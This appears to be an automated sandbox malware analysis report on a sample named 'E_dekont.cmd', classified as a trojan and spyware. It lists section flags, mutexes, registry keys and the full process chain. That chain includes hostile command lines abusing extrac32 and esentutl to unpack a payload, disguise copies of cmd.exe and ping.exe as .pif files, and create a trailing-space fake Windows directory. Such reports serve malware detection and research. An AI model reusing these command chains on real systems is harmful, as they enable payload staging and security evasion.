                Source: setup.exe0.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jaureg.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jucheck.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jusched.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler64.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdate.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateBroker.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: FXSSVC.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe0.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: maintenanceservice.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateComRegisterShell64.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateCore.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateOnDemand.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 117.0.5938.132_chrome_installer.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jabswitch.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java-rmi.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe0.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javacpl.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe0.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe0.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msdtc.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msiexec.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: PerceptionSimulationService.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jjs.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jp2launcher.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: keytool.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: kinit.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: klist.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ktab.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: orbd.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: pack200.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: policytool.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmid.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: perfhost.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Locator.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MsSense.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SensorDataService.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: snmptrap.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Spectrum.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssh-agent.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: TieringEngineService.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmiregistry.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: servertool.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssvagent.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: tnameserv.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: unpack200.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ie_to_edge_stub.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: cookie_exporter.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: identity_helper.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: setup.exe1.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msedgewebview2.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AgentService.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: vds.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: VSSVC.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wbengine.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: WmiApSrv.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wmpnetwk.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SearchIndexer.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 7z.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: VSSVC.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wbengine.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: WmiApSrv.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wmpnetwk.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SearchIndexer.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 7z.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF7FD4 GetDiskFreeSpaceA,4_2_02AF7FD4
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B06DC8 CoCreateInstance,4_2_02B06DC8
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,30_2_1002CBD0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNO
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac5-inf
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\YfJ3kkV1qkbw4RSw
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: NULL
                Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac59ea72c54-b
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac53d78ffaf-b
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_03
                Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB04912.TMP
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A12_1_00413780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A30_2_00413780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A30_1_00413780
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: E_dekont.cmdReversingLabs: Detection: 44%
                Source: E_dekont.cmdVirustotal: Detection: 46%
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
                Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                Source: unknownProcess created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: unknownProcess created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dll
